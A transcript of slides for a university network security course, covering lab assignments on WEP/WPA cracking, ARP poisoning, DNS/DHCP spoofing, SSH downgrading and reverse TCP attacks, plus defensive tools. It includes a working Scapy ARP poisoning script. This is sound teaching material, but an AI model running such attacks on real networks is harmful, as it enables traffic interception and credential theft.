ties327 network security (3-5 ects) - jyväskylän...
TRANSCRIPT
UNIVERSITY OF JYVÄSKYLÄ
TIES327 – Network Security (3-5 ECTS)
Prof. Timo Hämäläinen [email protected]
Department of Mathematical Information Technology
IT Faculty
University of Jyväskylä
UNIVERSITY OF JYVÄSKYLÄ
Important note!
If you have completed the "old course" TIES326 in year
2012 or 2013, you will not get credits from this
TIES327, as its' content has more than 50% similar
assignments as TIES326 has in 2012 and 2013.
Those students who has completed TIES326 before
2012, has possibility to get credits from TIES327.
UNIVERSITY OF JYVÄSKYLÄ
Goals of the course
Students understand what the term "security" keep
inside in particular in the networks and services point of view
... get familiar with the different security aspects and to understand
the necessary terms
…are cabable to apply the various tools in auditing and protecting
against network attacks
... learn to look for a new knowledge about this area
The feeling of safety can not to be ignorance !
The course focuses on hands-on making of the security issues
and learning by doing different networking security exercises
Remember: Use of the presented methods are illegal in the public
networks !!
UNIVERSITY OF JYVÄSKYLÄ
Prerequisites
• Basic knowledge about networks, TCP/IP- protocols
and programming
• For example courses (or similar knowledge)
• ITKP101- Tietokone ja tietoverkot työvälineenä
• ITKP104 – Tietoverkot
• ITKP102 - Ohjelmointi 1
UNIVERSITY OF JYVÄSKYLÄ
How to complete course ?
• Complete assignments
• Group of 1-3 students
• You should get at least 50% of total points and at least the same 50% of the each
assignments.
• 3 ECTS fulfilment: complete assignments 1-9
• 4 ECTS fulfilment: complete assignments 1-11
• 5 ECTS fulfilment complete all 13 assignments
• Different network attack configurations, tools for protecting and analysing networks
• MITM, WLAN cracking, VPN, Firewall, IDS etc.
• pfSense: http://www.pfsense.org/
• Snort: http://www.snort.org/
• Radamsa: http://code.google.com/p/ouspg/wiki/Radamsa
• Wireshark: http://www.wireshark.org/
• Scapy: http://secdev.org/projects/scapy/
• Kali Linux: http://www.kail.org/
• Exam (not obligatory, upgrading the grade, max. 15points.)
UNIVERSITY OF JYVÄSKYLÄ
About the assignments
1. Virtual network configuration
• In this first assignment, you will create and configure virtual
network which will be used for testing different kinds of network
attack.
• To do this you need an PC with 2 Gb of RAM (bigger is of course
better!).
• We have used Ubuntu, but it is of course possible to make the
same virtual network configuration, if you have Windows or Mac
OS by using corresponding commands.
• https://www.virtualbox.org/
UNIVERSITY OF JYVÄSKYLÄ
2: Security in social media/students presentations
(lecture 3)
Group of 1-4 students will make a presentation. The topic is security in
social media (duration of the presentation 20- 25 min).
Presentation should have the following aspects. Even better, if you
can create own live demo like eg. http://www.youtube.com/watch?v=-
H1qjiwQldw:
1. What kind of threats/attacks there exist in social media ?
• Social engineering, phising, Spam, code-injections, XSS,
CSRF/XSRF, DDoS etc.
2. How can you protect against these threats ?
3. Possibilities and drawbacks of Web technologies
• Asynchronous JavaScript And XML (AJAX), Cascading Style
Sheet (CSS), Flash, JSON ja XML etc.
All groups will return www- link (no attachment !) to their presentation
by 9.11 time 23:59 to: [email protected].
At the beginning of the lecture we will randomly select four groups to
keep their presentations
UNIVERSITY OF JYVÄSKYLÄ
About the assingments
3. WEP Cracking
• In this assignment you are going to crack a WEP key with tools available
at: http://aircrack-ng.org/
• It is intended to build your basic skills and get you familiar with the
wireless network security concepts.
• It assumes you have a working wireless card with drivers already
patched for injection.
• The basic concept behind this work is using aireplay-ng, which will replay
an ARP packet to generate new unique IVs.
• In turn, aircrack-ng uses the new unique IVs to crack the WEP key.
• It is important to understand what an ARP packet is
(http://tools.ietf.org/html/rfc826).
UNIVERSITY OF JYVÄSKYLÄ
4. WPA Cracking
• This assignment walks you through cracking WPA/WPA2 networks which use pre-shared keys.
• We recommend you do some background reading to better understand what WPA/WPA2 is.
• WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can
ONLY crack pre-shared keys.
• So make sure airodump-ng shows the network as having the authentication type of PSK,
otherwise, don't bother trying to crack it.
• There is another important difference between cracking WPA/WPA2 and WEP.
• This is the approach used to crack the WPA/WPA2 pre-shared key.
• Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain
brute force techniques can be used against WPA/WPA2.
• That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does
not speed up the attack.
• The only thing that does give the information to start an attack is the handshake between client
and AP.
• Handshaking is done when the client connects to the network.
• Although not absolutely true, for the purposes of this assignment, consider it true.
• Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes
impossible to crack the pre-shared key.
• The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in
length.
UNIVERSITY OF JYVÄSKYLÄ
5. ARP Poisoning
• In this assignment you are going to perform two Man-In-The-Middle (MITM)
attacks: poisoning ARP tables and redirecting ICMP traffic
• ARP poisoning is also known as ARP Spoofing, ARP Flooding and ARP
Poisoning Routing.
• So what basically is ARP poisoning ?
• It is technique which allows an attacker sniffs traffic from LAN, monitors it
and even stop it.
• ARP poisoning is done by sending fake or spoofed messages to an
Ethernet LAN card.
• By doing so an attacker manages to associate its MAC address with IP
address of another node on network
(which is basically default gateway IP).
• Then the traffic meant for gateway first goes to attacker and then to
gateway thus allowing attacker to sniff traffic from network.
UNIVERSITY OF JYVÄSKYLÄ
5. ICMP Redirection
• ICMP (Internet Control Message Protocol) is used to send error messages,
report problems and for routing purposes.
• When the router sends to the client for route redirection and indicates a
shorter route to some particular destination, a host-route entry is added to
the clients routing table.
• The attacker can change the clients routing table so as traffic from the client
to a web server will be redirected to the attacker.
• For this purpose the attacker sends ICMP redirect message to the client, in
which source IP is the gateway, source IP for redirection is the client,
destination IP for redirection is the web server and gateway is the attacker.
• After the client updates its routing table with the web servers IP address
and the attackers IP address, all traffic from the client to the web server is
redirected to the attacker.
UNIVERSITY OF JYVÄSKYLÄ
6. DNS spoofing
• In this exercise you are going to perform two Man-In-The-Middle (MITM) attacks: spoofing DNS
and DHCP servers.
• The Domain Name System translates names that human can understand to IP addresses.
• First, the client sends DNS query and the DNS server responds with DNS response.
• The DNS query and response have identical ID number and query.
• Then the client updates its DNS cache entries accordingly domain name and IP address.
• Assume that the attacker wants to change the clients DNS cache so that traffic from client to the
domain web.seclab,jyu.fi. will be redirected to the attackers server 192.168.1.102.
• For this purpose the attacker snifs DNS queries from the client and waits for DNS query with the
relevant query, then the attacker spoofs a DNS response e.g. with the attacker's IP.
• Client updates its DNS cache and therefore all traffic goes to the attacker. Attacker repeats to spoof
DNS responses to maintain a valid cache.
• However DNS query eventually arrives the DNS server and the server will respond with a legitimate
DNS response.
• When the client gets the legitimate response, it will update its cache.
• For this reason, ARP poisoning of the client should be done before DNS spoofing. In this section,
we show how to spoof the DNS server.
UNIVERSITY OF JYVÄSKYLÄ
6. DHCP spoofing
• The DHCP (Dynamic Host Configuration Protocol) is used to configure
network settings to hosts on IP networks.
• DHCP allows hosts to be dynamically configured with IP address, subnet
mask, gateway address and DNS server address.
• It works as follows: first, the client sends (broadcasts) DHCP discover
containing transaction ID.
• The DHCP server responds with DHCP offer which contains the same
transaction ID.
• The client then sends DHCP request and the DHCP server responds with
DHCP Ack.
• When the attacker applying DHCP spoofing attack an attacker waits for
DHCP discover request from the client.
UNIVERSITY OF JYVÄSKYLÄ
6. DHCP spoofing
• After getting this request the attacker spoofs a DHCP offer with assigning
malicious gateway or/and DNS server.
• After that the client responds with DHCP request and the attacker spoofs a
DHCP Ack as well.
• Finally, the client updates its DNS server and gateway addresses.
• However, when DHCP discover arrives the DHCP server this server
responds to the client with a legitimate DHCP offer.
• If the client gets the legitimate offer first then DHCP spoofing will not work.
• For this reason, the attacker DoS the DHCP server during the attack so as
DHCP server can not respond to clients.
• In this section, we show how to spoof the DHCP server.
UNIVERSITY OF JYVÄSKYLÄ
7. Annoying HTTP server and bank attack
• This assignment explains deals with two Man-In-The-Middle (MITM)
attacks: annoying HTTP server and bank attack.
• Once an attacker has been located in the middle between his victim and
other network nodes, he can easily change HTTP requests and responses
which go through him.
• In this section, the attacker changes web pages which the victim requested
from a web site to make the victim feel nervous.
• For this attack, the attacker first poisons the ARP cache of the victim in
order to be "in the middle".
• Then when the victim requests a web page he modifies all pictures
contained on the page and sends the result to the victim.
Bank attack
• In this section, we use the case when the attacker places himself "in the
middle" and then steals money from the victim's bank account, when the
victim logs in to the system.
• Despite the fact that cryptographic protocol SSL is used by the bank web
site, the attacker is still able to make transfer of the victim's money to
another bank account.
UNIVERSITY OF JYVÄSKYLÄ
8. SSH downgrading
• Secure Shell (SSH) is a cryptographic network protocol for secure data communication, remote
shell services or command execution and other secure network services between two networked
computers that it connects via a secure channel over an insecure network.
• The protocol specification distinguishes two major versions that are referred to as SSH-1 and
SSH-2.
• Here we consider the most famous example of a downgrade attack where the attacker forces the
client and the server to use the insecure SSH-1 protocol.
• The client sends a request to establish a SSH link to the server and asks it for the version it
supports. The server answers either with:
- ssh-2.xx, i.e. the server supports only SSH-2,
- ssh-1.99, i.e. the server supports SSH-1 and SSH-2,
- ssh-1.51, i.e. the server supports only SSH-1.
• In our example, the server is configured to support both SSH-1 and SSH-2 and the client is set
to use SSH-2 and SSH-1 but SSH-2 as a preference.
• In this case the hacker if he already is located in the middle (e.g. after applying ARP poisoning)
will change the answer by modifying the "1.99" string to "1.51" to indicate to the client that the
server supports only SSH-1 and thus forces the client to open a SSH-1 link.
• The client who thinks to use the secure SSH-2 protocol will login with SSH-1 and the password
will be immediately captured by the hacker because of the SSH-1 weak password authentication
mechanism.
UNIVERSITY OF JYVÄSKYLÄ
9. Reverse TCP attack
• Man-In-The-Middle attacks can be combined with such dangerous attacks
as reverse TCP connection.
• A firewall usually blocks open ports, but does not block outgoing traffic,
therefore a reverse connection is used to bypass firewall and router security
restrictions.
• For example, a Trojan horse running on a computer behind a firewall that
blocks incoming connections can easily open an outbound connection to a
remote host on the Internet.
• Once the connection is established, the remote host can send commands to
the Trojan horse.
• Trojan horses that use a reverse connection usually send SYN (TCP)
packets to the attacker's IP address.
• The attacker listens for these SYN packets and accepts the desired
connections.
UNIVERSITY OF JYVÄSKYLÄ
10. Configuring VPN connection with the help of
OpenVPN
• This assignment is used to configure OpenVPN server and client, set up
your own Certificate Authority (CA), generate keys and sign certificates.
• In addition, it describes dual-factor authentication based on username and
password, which are used by the server for authenticating a connecting
client.
• OpenVPN is a full-featured SSL VPN which implements secure network
extension using the industry standard SSL/TLS protocol, supports exible
client authentication methods based on certicates, smart cards, and/or
username/password credentials, and allows user or group-specific access
control policies using firewall rules applied to the VPN virtual interface.
UNIVERSITY OF JYVÄSKYLÄ
11. Public-key cryptography with GNU Privacy Guard
• Public-key cryptography allows you to communicate with someone securely without exchanging a
secret password first. With public-key encryption, instead of sharing a password, each party
generates a "keypair“ consisting of a "public" key and a "secret/private" key.
• Each party can then publish their "public" key to the world or send it directly to the other party,
while keeping their secret key private and safe. If you have Person's public key, you can do a few
things with it:
• Encrypt a message that only that Person can decrypt (they need their secret key to decrypt
it).
• Validate that Person signed a message with their secret key. This also lets you verify
strongly that the message was not corrupted nor modified in transmission.
• With your secret key, you can do following things:
• Decrypt messages encrypted with your public key.
• Sign messages that others can verify came from you (they need your public key to verify the
signature).
• This assignment explains how to configure and use Public Key Infrastructure (PKI), encrypt les
and sign emails by using GNU Privacy Guard (GPG).
• The GNU privacy guard is the GNU project's complete and free implementation of the OpenPGP
standard as defined by RFC4880. GPG allows to encrypt and sign your data and communication,
features a versatile key management system as well as access modules for all kinds of public key
directories
UNIVERSITY OF JYVÄSKYLÄ
12. Configuration of Snort and pfSense
• In this assignment you are going to install, configure and tune Snort and
pfSense for protecting your network.
• Snort is a free and open source network intrusion prevention system and
network intrusion detection system (signature based)
• pfSense is an open source firewall/router computer software distribution
based on FreeBSD.
UNIVERSITY OF JYVÄSKYLÄ
13. Network traffic anomaly detection
• In this assignment, HTTP access log file is preprocessed into a numerical
matrix, anomalous queries are found using dimensionality reduction and
clustering, and finally anomalous log lines are analyzed.
• In this exercise, it is assumed that some kind of Linux distribution is used
(running in virtualbox etc. is ne)
• Windows installation might be possible, but it is much easier on Linux.
• In the following examples, Octave software is used
• In addition, we need the package octave-statistics.
• If available, Matlab uses the same syntax.
• Python is also used, because the character distribution file will be generated
with it from the Apache log file.
UNIVERSITY OF JYVÄSKYLÄ
Tools used in assignments
Kali Linux http://www.kali.org/
From the creators of BackTrack comes Kali Linux, the most
advanced and versatile penetration testing distribution ever created.
BackTrack has grown far beyond its humble roots as a live CD and
has now become a full-fledged operating system
UNIVERSITY OF JYVÄSKYLÄ
Some tools used in assignments
Python https://www.python.org/
Scapy http://secdev.org/projects/scapy/
Scapy is a powerful interactive packet manipulation program. It is able to
forge or decode packets of a wide number of protocols, send them on the
wire, capture them, match requests and replies, and much more.
It can easily handle most classical tasks like scanning, tracerouting,
probing, unit tests, attacks or network discovery (it can replace hping, 85%
of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.).
It also performs very well at a lot of other specific tasks that most other tools
can't handle, like sending invalid frames, injecting your own 802.11 frames,
combining technics (VLAN hopping+ARP cache poisoning, VOIP decoding
on WEP encrypted channel, ...), etc.
UNIVERSITY OF JYVÄSKYLÄ
Tools used in assignments
Python scripts
ARP poisoning
ICMP Redirection
DNS spoofing
DHCP spoofing
Annoying HTTP server
Bank attack
SSH downgrading
Other files
Login database for the bank server
Certificate file for the bank server
Bank server
Keylogger for the Ubuntu reverse tcp attack
Keylog reader for the Ubuntu reverse tcp attack
UNIVERSITY OF JYVÄSKYLÄ
An example: ARP poisoning (Python)
from scapy.all import *
from time import sleep
import threading
import os, sys
class SpoofThread (threading.Thread):
def __init__(self, victim, gateway):
self.packet = ARP()
self.packet.psrc = gateway
self.packet.pdst = victim
threading.Thread.__init__(self)
def run (self):
counter = 0
print "spoofing " + str(self.packet.pdst) + " every 5 seconds..."
try:
while 1:
send(self.packet, verbose=0);
counter += 1
print 'poison #' + str(counter)
sleep(5);
except Exception as e:
print type(e)
print e.args
print e
pass
if __name__ == '__main__':
if len(sys.argv) != 3:
sys.exit('Usage: %s <victim(s) IP(s)> <spoofed source IP> \n example: python ArpSpoofing.py 192.168.72.128
192.168.72.2' % os.path.basename(__file__))
targets_dest_ips = [sys.argv[1]]
spoofed_src_ip = sys.argv[2]
for ip in targets_dest_ips:
SpoofThread(ip, spoofed_src_ip).start()
UNIVERSITY OF JYVÄSKYLÄ
Course grading
Total points Grade
55 5
50 4
45 3
40 2
30 1
Work load
Ca. 150 hours, consisting of lectures ca. 20 hours,
assignments x hours, of course depending on your
background skills.
UNIVERSITY OF JYVÄSKYLÄ
About the lectures
The lectures are intended to provide introduction to various
networking security topics and examples
The course focuses on hands-on making of the security issues and
learning by doing (not learning by listening !).
Some literature:
• Lot of research papers
• - IEEE Explore, http://ieeexplore.ieee.org/Xplore/dynhome.jsp
- ACM, http://portal.acm.org/dl.cfm
- Google scholar, http://scholar.google.com/
– http://site.ebrary.com/lib/jyvaskyla
• Introduction to Network Security
• Hacking Exposed Web 2.0 : Web 2.0 Security Secrets and
Solutions
• CEH : Certified Ethical Hacker Study Guide
UNIVERSITY OF JYVÄSKYLÄ
L1: Introduction to the network security
What is security and what are the goals
Threats of networks and IT- systems
Security policies
Risk calculation
Security offenses
Social Engineering
Phishing
Legislation
UNIVERSITY OF JYVÄSKYLÄ
L2: Recent networking security threats/malwares
(visiting lecture by Matti Kannela)
Trojan horses
Rootkits
Spyware Worms
Viruses
Adware
Backdoors
Ransomware
Etc.
UNIVERSITY OF JYVÄSKYLÄ
L3 : Security in social media (students presentations)
Assignment no. 2
Group of 1-4 students will make a presentation. The topic is security in
social media (duration of the presentation 20- 25 min).
Presentation should have the following aspects. Even better, if you
can create own live demo like eg. http://www.youtube.com/watch?v=-
H1qjiwQldw:
1. What kind of threats/attacks there exist in social media ?
• Social engineering, phising, Spam, code-injections, XSS,
CSRF/XSRF, DDoS etc.
2. How can you protect against these threats ?
3. Possibilities and drawbacks of Web technologies
• Asynchronous JavaScript And XML (AJAX), Cascading Style
Sheet (CSS), Flash, JSON ja XML etc.
All groups will return www- link (no attachment !) to their presentation
by 9.11 time 23:59 to: [email protected].
At the beginning of the lecture we will randomly select four groups to
keep their presentations
UNIVERSITY OF JYVÄSKYLÄ
L4: Security for 4G Cellular Networks
(visiting lecture by Zheng Chang)
Cellural networks security issues (PHY/MAC layers)
SECURITY THREATS
User Identity
Femtocells
Interoperability
RRC signalling
Other threats
Being an all-IP networks makes the system vulnerable
against IP attacks, such Deny of Service (DoS) over the
public IP addresses of the core network interfaces, traffic
eavesdropping and injection attacks.
UNIVERSITY OF JYVÄSKYLÄ
L5: Modelling attacks (visiting lecture by
Simo Huopio, Finnish defence forces)
Modelling and analysing attacks against network and
services
DDoS (Distributed Denial of Service)
Zero-Day attacks
APT (Advanced Persistent Threat)
Fuzzing/testing programs vulnerabilities
UNIVERSITY OF JYVÄSKYLÄ
L6: Protecting your networked services (visiting lecture
by Tapio Väärämäki, Exclusive Networks Finland)
CARM – Cyber Attack Remediation and Mitigation
UTM (Unified Threat Management)
NGFW (Next Generation Firewall)
WAF (Web Application Firewall)
Database Security
File Security
Endpoint Security
UNIVERSITY OF JYVÄSKYLÄ
L7: Monitoring and analysing the nework
data
Normal netwok behaviour
Anomality detection
How to gather data
Pre-processing and analysing the data
UNIVERSITY OF JYVÄSKYLÄ
Some links
http://www.cert.fi/
http://www.vm.fi/tietoturvallisuus
http://www.digitoday.fi/tietoturva
http://www.securityfocus.com
http://www.secureworks.com/cyber-threat-
intelligence/advanced-threat-services/